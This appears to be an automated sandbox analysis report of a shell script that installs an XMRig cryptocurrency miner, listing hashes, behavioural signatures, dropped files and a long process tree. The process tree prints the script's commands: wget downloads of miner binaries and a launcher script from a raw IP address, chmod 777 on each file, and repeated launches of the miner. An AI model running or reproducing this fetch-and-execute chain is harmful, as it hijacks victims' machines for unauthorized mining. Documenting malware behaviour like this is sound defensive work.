Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    24/10/2024, 01:53

General

  • Target

    8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh

  • Size

    244B

  • MD5

    9206fb1df325876fc6297e75be2a7d5a

  • SHA1

    2361ae7b1d637d0a4259f67cc36c2af142541262

  • SHA256

    8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb

  • SHA512

    12ce08238c8fc3e8591700718e3018c8405b946f38360655c394bc6801f7204b27c505f981da161fe16c3f570eb066c367ff86aa73163b3b7ddc37d3e14c3402

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 43 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 64 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads hardware information 1 TTPs 64 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Checks CPU configuration 1 TTPs 41 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 64 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 46 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
    /tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
    1⤵
      PID:1520
      • /usr/bin/wget
        wget http://45.202.35.107/xmrigDaemon
        2⤵
        • Writes file to tmp directory
        PID:1521
      • /usr/bin/wget
        wget http://45.202.35.107/xmrigMiner
        2⤵
        • Writes file to tmp directory
        PID:1525
      • /usr/bin/wget
        wget http://45.202.35.107/config.json
        2⤵
        • Writes file to tmp directory
        PID:1526
      • /usr/bin/wget
        wget http://45.202.35.107/check.sh
        2⤵
        • Writes file to tmp directory
        PID:1527
      • /bin/chmod
        chmod 777 xmrigMiner
        2⤵
        • File and Directory Permissions Modification
        PID:1528
      • /bin/chmod
        chmod 777 xmrigDaemon
        2⤵
        • File and Directory Permissions Modification
        PID:1529
      • /bin/chmod
        chmod 777 check.sh
        2⤵
        • File and Directory Permissions Modification
        PID:1530
    • /tmp/check.sh
      ./check.sh
      1⤵
      • Executes dropped EXE
      PID:1531
      • /usr/bin/pgrep
        pgrep -f xmrigDaemon
        2⤵
        • Reads runtime system information
        PID:1532
      • /tmp/xmrigDaemon
        ./xmrigDaemon
        2⤵
        • Executes dropped EXE
        PID:1533
        • /bin/sh
          sh -c "\"./xmrigMiner\" --daemonized"
          3⤵
            PID:1534
            • /tmp/xmrigMiner
              ./xmrigMiner --daemonized
              4⤵
              • Executes dropped EXE
              • Checks hardware identifiers (DMI)
              • Reads hardware information
              • Checks CPU configuration
              • Reads CPU attributes
              • Reads runtime system information
              • Writes file to tmp directory
              PID:1535
          • /bin/sh
            sh -c "\"./xmrigMiner\" --daemonized"
            3⤵
              PID:1542
              • /tmp/xmrigMiner
                ./xmrigMiner --daemonized
                4⤵
                • Executes dropped EXE
                • Checks hardware identifiers (DMI)
                • Reads hardware information
                • Checks CPU configuration
                • Reads CPU attributes
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:1543
            • /bin/sh
              sh -c "\"./xmrigMiner\" --daemonized"
              3⤵
                PID:1550
                • /tmp/xmrigMiner
                  ./xmrigMiner --daemonized
                  4⤵
                  • Executes dropped EXE
                  • Checks hardware identifiers (DMI)
                  • Reads hardware information
                  • Checks CPU configuration
                  • Enumerates kernel/hardware configuration
                  • Writes file to tmp directory
                  PID:1551
              • /bin/sh
                sh -c "\"./xmrigMiner\" --daemonized"
                3⤵
                  PID:1558
                  • /tmp/xmrigMiner
                    ./xmrigMiner --daemonized
                    4⤵
                    • Executes dropped EXE
                    • Checks hardware identifiers (DMI)
                    • Reads hardware information
                    • Checks CPU configuration
                    • Reads CPU attributes
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:1559
                • /bin/sh
                  sh -c "\"./xmrigMiner\" --daemonized"
                  3⤵
                    PID:1566
                    • /tmp/xmrigMiner
                      ./xmrigMiner --daemonized
                      4⤵
                      • Executes dropped EXE
                      • Checks hardware identifiers (DMI)
                      • Reads hardware information
                      • Checks CPU configuration
                      • Reads CPU attributes
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:1567
                  • /bin/sh
                    sh -c "\"./xmrigMiner\" --daemonized"
                    3⤵
                      PID:1574
                      • /tmp/xmrigMiner
                        ./xmrigMiner --daemonized
                        4⤵
                        • Executes dropped EXE
                        • Checks hardware identifiers (DMI)
                        • Reads hardware information
                        • Checks CPU configuration
                        • Reads CPU attributes
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:1575
                    • /bin/sh
                      sh -c "\"./xmrigMiner\" --daemonized"
                      3⤵
                        PID:1582
                        • /tmp/xmrigMiner
                          ./xmrigMiner --daemonized
                          4⤵
                          • Executes dropped EXE
                          • Checks hardware identifiers (DMI)
                          • Reads hardware information
                          • Checks CPU configuration
                          • Reads CPU attributes
                          • Writes file to tmp directory
                          PID:1583
                      • /bin/sh
                        sh -c "\"./xmrigMiner\" --daemonized"
                        3⤵
                          PID:1590
                          • /tmp/xmrigMiner
                            ./xmrigMiner --daemonized
                            4⤵
                            • Executes dropped EXE
                            • Reads hardware information
                            • Checks CPU configuration
                            • Enumerates kernel/hardware configuration
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:1591
                        • /bin/sh
                          sh -c "\"./xmrigMiner\" --daemonized"
                          3⤵
                            PID:1598
                            • /tmp/xmrigMiner
                              ./xmrigMiner --daemonized
                              4⤵
                              • Executes dropped EXE
                              • Checks hardware identifiers (DMI)
                              • Reads hardware information
                              • Checks CPU configuration
                              • Reads CPU attributes
                              • Enumerates kernel/hardware configuration
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:1599
                          • /bin/sh
                            sh -c "\"./xmrigMiner\" --daemonized"
                            3⤵
                              PID:1606
                              • /tmp/xmrigMiner
                                ./xmrigMiner --daemonized
                                4⤵
                                • Executes dropped EXE
                                • Reads hardware information
                                • Checks CPU configuration
                                • Enumerates kernel/hardware configuration
                                • Writes file to tmp directory
                                PID:1607
                            • /bin/sh
                              sh -c "\"./xmrigMiner\" --daemonized"
                              3⤵
                                PID:1614
                                • /tmp/xmrigMiner
                                  ./xmrigMiner --daemonized
                                  4⤵
                                  • Executes dropped EXE
                                  • Checks hardware identifiers (DMI)
                                  • Reads hardware information
                                  • Checks CPU configuration
                                  • Enumerates kernel/hardware configuration
                                  • Writes file to tmp directory
                                  PID:1615
                              • /bin/sh
                                sh -c "\"./xmrigMiner\" --daemonized"
                                3⤵
                                  PID:1622
                                  • /tmp/xmrigMiner
                                    ./xmrigMiner --daemonized
                                    4⤵
                                    • Executes dropped EXE
                                    • Checks hardware identifiers (DMI)
                                    • Reads hardware information
                                    • Checks CPU configuration
                                    • Reads CPU attributes
                                    • Enumerates kernel/hardware configuration
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:1623
                                • /bin/sh
                                  sh -c "\"./xmrigMiner\" --daemonized"
                                  3⤵
                                    PID:1630
                                    • /tmp/xmrigMiner
                                      ./xmrigMiner --daemonized
                                      4⤵
                                      • Executes dropped EXE
                                      • Checks hardware identifiers (DMI)
                                      • Reads hardware information
                                      • Checks CPU configuration
                                      • Writes file to tmp directory
                                      PID:1631
                                  • /bin/sh
                                    sh -c "\"./xmrigMiner\" --daemonized"
                                    3⤵
                                      PID:1640
                                      • /tmp/xmrigMiner
                                        ./xmrigMiner --daemonized
                                        4⤵
                                        • Executes dropped EXE
                                        • Checks hardware identifiers (DMI)
                                        • Reads hardware information
                                        • Checks CPU configuration
                                        • Reads CPU attributes
                                        • Enumerates kernel/hardware configuration
                                        • Writes file to tmp directory
                                        PID:1641
                                    • /bin/sh
                                      sh -c "\"./xmrigMiner\" --daemonized"
                                      3⤵
                                        PID:1648
                                        • /tmp/xmrigMiner
                                          ./xmrigMiner --daemonized
                                          4⤵
                                          • Executes dropped EXE
                                          • Checks hardware identifiers (DMI)
                                          • Reads hardware information
                                          • Checks CPU configuration
                                          • Reads CPU attributes
                                          • Enumerates kernel/hardware configuration
                                          • Writes file to tmp directory
                                          PID:1649
                                      • /bin/sh
                                        sh -c "\"./xmrigMiner\" --daemonized"
                                        3⤵
                                          PID:1656
                                          • /tmp/xmrigMiner
                                            ./xmrigMiner --daemonized
                                            4⤵
                                            • Executes dropped EXE
                                            • Checks CPU configuration
                                            • Reads CPU attributes
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            • Writes file to tmp directory
                                            PID:1657
                                        • /bin/sh
                                          sh -c "\"./xmrigMiner\" --daemonized"
                                          3⤵
                                            PID:1664
                                            • /tmp/xmrigMiner
                                              ./xmrigMiner --daemonized
                                              4⤵
                                              • Executes dropped EXE
                                              • Checks hardware identifiers (DMI)
                                              • Reads hardware information
                                              • Checks CPU configuration
                                              • Reads CPU attributes
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              • Writes file to tmp directory
                                              PID:1665
                                          • /bin/sh
                                            sh -c "\"./xmrigMiner\" --daemonized"
                                            3⤵
                                              PID:1672
                                              • /tmp/xmrigMiner
                                                ./xmrigMiner --daemonized
                                                4⤵
                                                • Executes dropped EXE
                                                • Checks hardware identifiers (DMI)
                                                • Reads hardware information
                                                • Checks CPU configuration
                                                • Reads CPU attributes
                                                • Enumerates kernel/hardware configuration
                                                • Writes file to tmp directory
                                                PID:1673
                                            • /bin/sh
                                              sh -c "\"./xmrigMiner\" --daemonized"
                                              3⤵
                                                PID:1680
                                                • /tmp/xmrigMiner
                                                  ./xmrigMiner --daemonized
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Checks hardware identifiers (DMI)
                                                  • Reads hardware information
                                                  • Checks CPU configuration
                                                  • Enumerates kernel/hardware configuration
                                                  • Reads runtime system information
                                                  • Writes file to tmp directory
                                                  PID:1681
                                              • /bin/sh
                                                sh -c "\"./xmrigMiner\" --daemonized"
                                                3⤵
                                                  PID:1688
                                                  • /tmp/xmrigMiner
                                                    ./xmrigMiner --daemonized
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Checks hardware identifiers (DMI)
                                                    • Checks CPU configuration
                                                    • Reads CPU attributes
                                                    • Writes file to tmp directory
                                                    PID:1689
                                                • /bin/sh
                                                  sh -c "\"./xmrigMiner\" --daemonized"
                                                  3⤵
                                                    PID:1696
                                                    • /tmp/xmrigMiner
                                                      ./xmrigMiner --daemonized
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Checks hardware identifiers (DMI)
                                                      • Reads hardware information
                                                      • Checks CPU configuration
                                                      • Reads CPU attributes
                                                      • Enumerates kernel/hardware configuration
                                                      • Reads runtime system information
                                                      • Writes file to tmp directory
                                                      PID:1697
                                                  • /bin/sh
                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                    3⤵
                                                      PID:1704
                                                      • /tmp/xmrigMiner
                                                        ./xmrigMiner --daemonized
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Checks hardware identifiers (DMI)
                                                        • Reads hardware information
                                                        • Checks CPU configuration
                                                        • Reads CPU attributes
                                                        • Enumerates kernel/hardware configuration
                                                        • Reads runtime system information
                                                        • Writes file to tmp directory
                                                        PID:1705
                                                    • /bin/sh
                                                      sh -c "\"./xmrigMiner\" --daemonized"
                                                      3⤵
                                                        PID:1712
                                                        • /tmp/xmrigMiner
                                                          ./xmrigMiner --daemonized
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Checks hardware identifiers (DMI)
                                                          • Checks CPU configuration
                                                          • Reads CPU attributes
                                                          • Enumerates kernel/hardware configuration
                                                          • Reads runtime system information
                                                          • Writes file to tmp directory
                                                          PID:1713
                                                      • /bin/sh
                                                        sh -c "\"./xmrigMiner\" --daemonized"
                                                        3⤵
                                                          PID:1720
                                                          • /tmp/xmrigMiner
                                                            ./xmrigMiner --daemonized
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Checks hardware identifiers (DMI)
                                                            • Checks CPU configuration
                                                            • Reads CPU attributes
                                                            • Enumerates kernel/hardware configuration
                                                            • Writes file to tmp directory
                                                            PID:1721
                                                        • /bin/sh
                                                          sh -c "\"./xmrigMiner\" --daemonized"
                                                          3⤵
                                                            PID:1728
                                                            • /tmp/xmrigMiner
                                                              ./xmrigMiner --daemonized
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Checks hardware identifiers (DMI)
                                                              • Reads hardware information
                                                              • Checks CPU configuration
                                                              • Enumerates kernel/hardware configuration
                                                              • Writes file to tmp directory
                                                              PID:1729
                                                          • /bin/sh
                                                            sh -c "\"./xmrigMiner\" --daemonized"
                                                            3⤵
                                                              PID:1736
                                                              • /tmp/xmrigMiner
                                                                ./xmrigMiner --daemonized
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Reads hardware information
                                                                • Checks CPU configuration
                                                                • Reads CPU attributes
                                                                • Writes file to tmp directory
                                                                PID:1737
                                                            • /bin/sh
                                                              sh -c "\"./xmrigMiner\" --daemonized"
                                                              3⤵
                                                                PID:1744
                                                                • /tmp/xmrigMiner
                                                                  ./xmrigMiner --daemonized
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Checks hardware identifiers (DMI)
                                                                  • Reads hardware information
                                                                  • Checks CPU configuration
                                                                  • Enumerates kernel/hardware configuration
                                                                  • Writes file to tmp directory
                                                                  PID:1745
                                                              • /bin/sh
                                                                sh -c "\"./xmrigMiner\" --daemonized"
                                                                3⤵
                                                                  PID:1752
                                                                  • /tmp/xmrigMiner
                                                                    ./xmrigMiner --daemonized
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Reads hardware information
                                                                    • Checks CPU configuration
                                                                    • Reads CPU attributes
                                                                    • Enumerates kernel/hardware configuration
                                                                    • Writes file to tmp directory
                                                                    PID:1753
                                                                • /bin/sh
                                                                  sh -c "\"./xmrigMiner\" --daemonized"
                                                                  3⤵
                                                                    PID:1760
                                                                    • /tmp/xmrigMiner
                                                                      ./xmrigMiner --daemonized
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Checks hardware identifiers (DMI)
                                                                      • Checks CPU configuration
                                                                      • Reads CPU attributes
                                                                      • Reads runtime system information
                                                                      • Writes file to tmp directory
                                                                      PID:1761
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1768
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Writes file to tmp directory
                                                                        PID:1769
                                                                    • /bin/sh
                                                                      sh -c "\"./xmrigMiner\" --daemonized"
                                                                      3⤵
                                                                        PID:1776
                                                                        • /tmp/xmrigMiner
                                                                          ./xmrigMiner --daemonized
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Reads hardware information
                                                                          • Checks CPU configuration
                                                                          • Reads CPU attributes
                                                                          • Enumerates kernel/hardware configuration
                                                                          • Writes file to tmp directory
                                                                          PID:1777
                                                                      • /bin/sh
                                                                        sh -c "\"./xmrigMiner\" --daemonized"
                                                                        3⤵
                                                                          PID:1784
                                                                          • /tmp/xmrigMiner
                                                                            ./xmrigMiner --daemonized
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Checks hardware identifiers (DMI)
                                                                            • Reads hardware information
                                                                            • Checks CPU configuration
                                                                            • Enumerates kernel/hardware configuration
                                                                            • Writes file to tmp directory
                                                                            PID:1785
                                                                        • /bin/sh
                                                                          sh -c "\"./xmrigMiner\" --daemonized"
                                                                          3⤵
                                                                            PID:1792
                                                                            • /tmp/xmrigMiner
                                                                              ./xmrigMiner --daemonized
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Reads hardware information
                                                                              • Checks CPU configuration
                                                                              • Reads CPU attributes
                                                                              • Enumerates kernel/hardware configuration
                                                                              • Writes file to tmp directory
                                                                              PID:1793
                                                                          • /bin/sh
                                                                            sh -c "\"./xmrigMiner\" --daemonized"
                                                                            3⤵
                                                                              PID:1800
                                                                              • /tmp/xmrigMiner
                                                                                ./xmrigMiner --daemonized
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Checks hardware identifiers (DMI)
                                                                                • Checks CPU configuration
                                                                                • Reads CPU attributes
                                                                                • Writes file to tmp directory
                                                                                PID:1801
                                                                            • /bin/sh
                                                                              sh -c "\"./xmrigMiner\" --daemonized"
                                                                              3⤵
                                                                                PID:1808
                                                                                • /tmp/xmrigMiner
                                                                                  ./xmrigMiner --daemonized
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks hardware identifiers (DMI)
                                                                                  • Reads hardware information
                                                                                  • Checks CPU configuration
                                                                                  • Reads CPU attributes
                                                                                  • Enumerates kernel/hardware configuration
                                                                                  • Writes file to tmp directory
                                                                                  PID:1809
                                                                              • /bin/sh
                                                                                sh -c "\"./xmrigMiner\" --daemonized"
                                                                                3⤵
                                                                                  PID:1816
                                                                                  • /tmp/xmrigMiner
                                                                                    ./xmrigMiner --daemonized
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks hardware identifiers (DMI)
                                                                                    • Reads hardware information
                                                                                    • Checks CPU configuration
                                                                                    • Enumerates kernel/hardware configuration
                                                                                    • Reads runtime system information
                                                                                    • Writes file to tmp directory
                                                                                    PID:1817
                                                                                • /bin/sh
                                                                                  sh -c "\"./xmrigMiner\" --daemonized"
                                                                                  3⤵
                                                                                    PID:1824
                                                                                    • /tmp/xmrigMiner
                                                                                      ./xmrigMiner --daemonized
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks hardware identifiers (DMI)
                                                                                      • Reads hardware information
                                                                                      • Checks CPU configuration
                                                                                      • Reads CPU attributes
                                                                                      • Enumerates kernel/hardware configuration
                                                                                      • Reads runtime system information
                                                                                      • Writes file to tmp directory
                                                                                      PID:1825
                                                                                  • /bin/sh
                                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                                    3⤵
                                                                                      PID:1832
                                                                                      • /tmp/xmrigMiner
                                                                                        ./xmrigMiner --daemonized
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Reads hardware information
                                                                                        • Checks CPU configuration
                                                                                        • Reads CPU attributes
                                                                                        • Enumerates kernel/hardware configuration
                                                                                        • Reads runtime system information
                                                                                        • Writes file to tmp directory
                                                                                        PID:1833
                                                                                    • /bin/sh
                                                                                      sh -c "\"./xmrigMiner\" --daemonized"
                                                                                      3⤵
                                                                                        PID:1840
                                                                                        • /tmp/xmrigMiner
                                                                                          ./xmrigMiner --daemonized
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks hardware identifiers (DMI)
                                                                                          • Checks CPU configuration
                                                                                          • Reads CPU attributes
                                                                                          • Enumerates kernel/hardware configuration
                                                                                          • Reads runtime system information
                                                                                          • Writes file to tmp directory
                                                                                          PID:1841
                                                                                      • /bin/sh
                                                                                        sh -c "\"./xmrigMiner\" --daemonized"
                                                                                        3⤵
                                                                                          PID:1848
                                                                                          • /tmp/xmrigMiner
                                                                                            ./xmrigMiner --daemonized
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks hardware identifiers (DMI)
                                                                                            • Reads hardware information
                                                                                            • Checks CPU configuration
                                                                                            • Reads CPU attributes
                                                                                            • Enumerates kernel/hardware configuration
                                                                                            • Reads runtime system information
                                                                                            • Writes file to tmp directory
                                                                                            PID:1849
                                                                                        • /bin/sh
                                                                                          sh -c "\"./xmrigMiner\" --daemonized"
                                                                                          3⤵
                                                                                            PID:1856
                                                                                            • /tmp/xmrigMiner
                                                                                              ./xmrigMiner --daemonized
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks hardware identifiers (DMI)
                                                                                              • Reads hardware information
                                                                                              • Checks CPU configuration
                                                                                              • Reads CPU attributes
                                                                                              • Enumerates kernel/hardware configuration
                                                                                              • Reads runtime system information
                                                                                              • Writes file to tmp directory
                                                                                              PID:1857

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • /tmp/check.sh

                                                                                        Filesize

                                                                                        823B

                                                                                        MD5

                                                                                        3284592438c4df2dd14b74cec93c6015

                                                                                        SHA1

                                                                                        1662db32dd1b9ebcf38b20b8d6c2212912bf250e

                                                                                        SHA256

                                                                                        b456d2835bda6f651883e81201e12e4b7fbb9ad644f17016fbf5553c155cf958

                                                                                        SHA512

                                                                                        54af1b77dcad7a64a5e5abfae973770e3702dad5f6c3a4738e06ae1cb2a677dea08bb3360a68a8ae9a0dec3d35355a7ecc0351bbe686f9f3ae55abfcc92b0af2

                                                                                      • /tmp/logggz.lgo

                                                                                        Filesize

                                                                                        39KB

                                                                                        MD5

                                                                                        68ca711184451bc4e72c5b615d4a8b5c

                                                                                        SHA1

                                                                                        d9a0f0fd8bdb37fdea7596ab52be43c254c81790

                                                                                        SHA256

                                                                                        ed2e669b35586da965d1579844463bcb26e73bcc38152f34bbae1529ea2330d9

                                                                                        SHA512

                                                                                        e6baa4fe37954cc820c8700f1a153865cee4b5d02c5caad295148c0e45714ed5cb3e42ca5c494ca9feb8e32f2ae550b2c2ea7e9e517fcb6d7857ef5e9bc3b851

                                                                                      • /tmp/xmrigDaemon

                                                                                        Filesize

                                                                                        629KB

                                                                                        MD5

                                                                                        bd98e7c9ca771be14cd9229bc1636732

                                                                                        SHA1

                                                                                        4a4723378eb0268f4659f1b1d3f2be5f74e20b87

                                                                                        SHA256

                                                                                        0ea2d73e47b8642b24371be112fb04e455bc8577fa17911bd17793887cedeb7e

                                                                                        SHA512

                                                                                        cd641b0325242bfec608fae6d09c716d2a6519bf2aafeef025e7330c2c1e1c63d90b1b15307adcfa3d3fd4ccaff4003d4facc68038283f7b47ecdfd631380608

                                                                                      • /tmp/xmrigMiner

                                                                                        Filesize

                                                                                        7.9MB

                                                                                        MD5

                                                                                        98d1e494adf9aa586221feeaa74aaf8a

                                                                                        SHA1

                                                                                        2cbc1044034e21dbaaea4afce3aef772aa468041

                                                                                        SHA256

                                                                                        c58301ea640b622c52599d530e2a4d302025d4b23dca1b78f61405655733207f

                                                                                        SHA512

                                                                                        fdd937825c461ce010697b2bb44c6e78bdc7be682c49c4339719a1d2d4c3f38930dd8a0277461ce93f4cc80474a22836a20877da447cb8f8b73ce8182a2a0791